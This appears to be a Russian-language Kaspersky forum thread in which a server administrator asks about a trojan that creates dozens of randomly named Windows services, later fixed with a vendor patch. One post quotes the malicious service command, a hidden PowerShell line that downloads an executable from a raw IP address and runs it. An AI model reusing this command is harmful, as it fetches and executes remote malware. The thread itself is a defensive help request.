Перейти к содержанию

Есть ли информация по трояну? Создает службы ABvYIW-zzCyfQ


Рекомендуемые сообщения

Есть ли информация по трояну? Не могу отследить откуда он срабатывает и какой механизм использует. В интернете никакой информации.


Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает.


В службах создаются со случайным наборов букв несколько десятков служб типа ABvYIW ..... zzCyfQ. В службе - выполнение скрипта powershell, в 2003 конечно же он не срабатывает из-за отсутствия powershell.


cmd /c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX (New-Object Net.WebClient).DownloadFile('http://91.211.88.100/nw.exe,C:\Users\Public\nw.exe');Start-ProcessC:\Users\Public\nw.exe


Хотел сам скачать этот файл и его проверить антивирусом, но сайт не отвечает, файл недоступен. Понимаю, что в будущем ничто не мешает этому файлу появиться.


Ссылка на комментарий
Поделиться на другие сайты

внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».

https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

Ссылка на комментарий
Поделиться на другие сайты

Спасибо. Начал выполнять по инструкции и сразу обнаружил в памяти троян, который все это создает. Нашел описание по этому трояну, что необходимо обновить версии продуктов до самых последних (у меня предпоследнии версии). Проблема решена.

Ссылка на комментарий
Поделиться на другие сайты

Windows Security 10.0 и 10.1.1 for Windows Server не обнаруживают вирус. Не предотвращает заражение и не видит его даже при запуске вручную сканирования памяти. KVRT находит trojan.multi.genautorunreg.c и удаляет его, но через некоторое время сервер опять заражается.

 

Автоматический сбор логов пока не могу сделать, он пишет, что будет перезагрузка.

Изменено пользователем AleckK
Ссылка на комментарий
Поделиться на другие сайты

Смешно конечно, но это сервера, на них работают удаленно. Даже с ключем mstsc /admin скрипт не запускается. Запустить чиста с консоли на этих серверах невозможно, они за сотни километров, местного админа там нет. Буду писать официальный запрос в техподдержку.


Пусть решают. Это смешно уже. Бесплатная утилита видит вирус, а антивирус, специально созданный для сервера не видит! Отлично мы покупаем ПО.

Изменено пользователем AleckK
Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...
Дмитрий Петренко

Сообщение от модератора kmscom
Изменено пользователем kmscom
Ссылка на комментарий
Поделиться на другие сайты

Да. Выслали патч, который, я так понимаю, еще не вышел в официальное обновление. С этим патчем антивирус видит трояна и лечит.

critical_fix_core_3(14909).zip [16.67 MB]

Изменено пользователем AleckK
  • Спасибо (+1) 1
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Sapfira
      Автор Sapfira
      Обнаружилось, что для одного из SSD нет столбиков "текущее", наихудшее" и "порог", показывает только Raw-значения. Раньше, вроде, всё было.
      С чем может быть связано? У другого SSD всё на месте.

    • Корчагин Степан
      Автор Корчагин Степан
      Всем привет!
      С этого момента здесь мы будем публиковать новости о бета-тестировании.
      Присоединяйтесь к нашему бета-тестированию на нашем специальном ресурсе (лучше регистрироваться под тем же ником, что и тут), приглашайте своих друзей, помогайте нам создавать лучшее защитное программное обеспечение в мире, получайте клубные баллы и другие подарки от нас.
       
      Последние бета-версии продуктов Касперского для Windows (21.8.4.272) можно получить здесь:
      Kaspersky — https://box.kaspersky.com/d/faa52e0ba68c4c5aaa45/
      Kaspersky VPN — https://box.kaspersky.com/d/cc7a0ae4207148b6a0cf/
      KSOS— https://box.kaspersky.com/d/941e5b357d2d45f39dd4/
      KES— https://box.kaspersky.com/d/dbc8bf07bd8a45a3b0bc/
       
      Пожалуйста, сообщайте об ошибках и отзывах на нашем форуме бета-тестирования:
      Для домашних продуктов (Kaspersky, Kaspersky VPN) - https://eap.kaspersky.com/category/354/home
      Для бизнес-продуктов (KES, KSOS) - https://eap.kaspersky.com/category/356/business

      Информацию о изменении актуальной версии бета-продуктов мы будем публиковать здесь, в следующих обновлениях.
      Увидимся!
    • AbzalRai
      Автор AbzalRai
      Добрый день. Прошу помощи, переименовались файлы в службах, wuauserv_bkp, UsoSvc_bkp, BITS_bkp, WaaSMedicSvc_bkp, dosvc_bkp. недавно подцепил майнер (система нагружался) удалил утилитой Доктор Паутиной. но к сожалению оставил след. теперь не могу запускать обновление системы и майкрософт магазин. прошу помочь в решение этой проблемы. В инете не нашел общего решение. у всех по разному как я вижу. 
      Вроде собрал для вас все виды логов. надеюсь все правильно сделал. 
       
      Logs.rar
    • SonG
      Автор SonG
      Добрый день!  На Server 2022 (Standart) появились вирусы.
      1. Сначала был Trojan.Win32.SEPEH, но после 3-4 проверок Kaspersky Endpoint Security, пропал. В это время уже центр обновлений не работал
      2. Дальше полез в реестр и слкжбы службы. На службах wuauserv, usosvc, BITS, WaaSMedicSvc, DoSvc, wuaserv, был постфикс "_bak" (оригиналы при этом были). Удалил из под безопасного режима, прогнал антивирусом и перезапустился. Вроде больше не появлялись.
       
      Теперь центр обновлений так и не работает, но на глаз попались другие службы, где уже другие названия:
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CaptureService_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cbdhsvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDPUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ConsentUxUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DeviceAssociationBrokerSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DevicePickerUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DevicesFlowUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PimIndexMaintenanceSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UdkUserSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserDataSvc_b1e5e [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WpnUserService_b1e5e  
      Что делать, куда "копать" ?) 
      Физический доступ к серверу бывает раз в день (99% операций провожу под RDP)
      CollectionLog-2025.06.01-16.59.zip FRST.txt Addition.txt
    • Ярослав1_1
      Автор Ярослав1_1
      CollectionLog-2025.07.16-13.18.zipВот лог, надеюсь чир сможете помочь
      Вирус удалил Центр обновления Windows, переименовал службу в wuauserv_bkp
       
      Похожая проблема 
      Вирус удалил Центр обновления Windows, переименовал службу в wuauserv_bkp
       
×
×
  • Создать...